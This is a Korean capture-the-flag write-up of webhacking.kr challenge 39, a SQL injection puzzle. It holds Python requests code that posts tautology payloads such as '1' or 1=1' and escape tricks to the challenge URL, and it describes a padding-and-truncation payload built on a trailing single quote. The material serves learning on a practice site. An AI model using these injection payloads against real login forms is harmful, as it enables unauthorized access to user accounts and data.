# 문제

![39-01](img/39-01.PNG)

id를 추측해서 입력해야하는 문제로 보인다. 아 아니구나. 그냥 SQLi이다.

# 풀이

언제나 그렇듯이 php필터링에는 phptester.net를 사용하자.

![39-02](img/39-02.PNG)

쓸 때마다 생각하는거지만 phptester.net는 문제가 좀 많다.

![39-03](img/39-03.PNG)

어쩔 수 없으니 그냥 python 풀어보도록 하자.<br>
일단 필터링이 없다고 가정했을 때, 대충 1' or 1=1 정도를 넣어주면 풀릴 것 같다.<br>
문제는 싱글쿼터(')가 필터링 당했다는 것이다.

In [25]:
import binascii
id = '10x'+binascii.hexlify(b"'").decode()+' or 1=1'
print(len(id))
print(id)

12
10x27 or 1=1


In [26]:
import requests
r = requests.post('https://webhacking.kr/challenge/bonus-10/index.php',data={'id':id})
print(r.text)

<html>
<head>
<title>Chellenge 39</title>
</head>
<body>
<form method=post action=index.php>
<input type=text name=id maxlength=15 size=30>
<input type=submit>
</form>
<a href=?view_source=1>view-source</a>
</body>
</html>




위의 코드는 나름 좋았던거 같은데 '가 16진수로 변해서 그런지 실패했다.

In [82]:
#id = '10x'+binascii.hexlify(b"\'").decode()+' or 1=1'
id = '1\\\\\\\' or 1=1'
print(len(id))
print(id)

16
1\\\NULL' or 1=1


In [83]:
r = requests.post('https://webhacking.kr/challenge/bonus-10/index.php',data={'id':id})
print(r.text)

<html>
<head>
<title>Chellenge 39</title>
</head>
<body>
<form method=post action=index.php>
<input type=text name=id maxlength=15 size=30>
<input type=submit>
</form>
<a href=?view_source=1>view-source</a>
</body>
</html>




select 1 from member where length(id)<14 and id='   1\\\' or 1=1
<br>에서<br><br>
첫 필터링을 거치면 1\' or 1=1 만이 남을 것인데, 두 번째 필터링을 거치면,

1. 1\' or 1=1
2. 1\'' or 1=1

둘 중 어느 모습이 될지를 잘 모르겠다. 2번이 나와야 성공하는 거라고 생각했는데, 위의 python이 실패한 걸로 봐서는 1번의 모습이 된 것 같다. '하나만 찍어내면 끝나는 건데, 그게 안된다.

뭔가 null문자 같은거 없나. php에서는 \ ''로 인식하면서, sql문에서는 \''로 인식하게 하는.

아 역시 SQL인젝션은 어렵다.

# 포기

그런고로 또다시 컨닝을 시작한다.

와 헛다리 짚고 있었네. \랑 '가 중요한줄 알았는데 '랑 15글자 이하라는게 중요했다.<br>
id값 + id값+1의 길이를 제외한 만큼 공백문자 입력 + '(싱글쿼터)<br>
ex) admin + 공백문자9개 + ' <br>
마지막이 '인 15글자를 입력하면 2번째 필터링에서 '가 하나 더붙어서 16문자가 되고, 3번째 필터링에서 다시 15문자로 들어간다. 결국 sql에는 

~~~
admin         '
~~~

가 들어가게 되는 것이다.

추가로, 굳이 admin을 입력해야되나해서 여러가지 입력해봤는데, aaaaa,zzzzz,admin,guest,new_ch,new_ch2 등 여러가지 입력이 가능했다. new_ch랑 new_ch2는 내가 만든 ID인데 들어가는걸 보면 member는 webhacking.kr의 모든 사용자들의 정보가 있는 table인 것으로 보인다.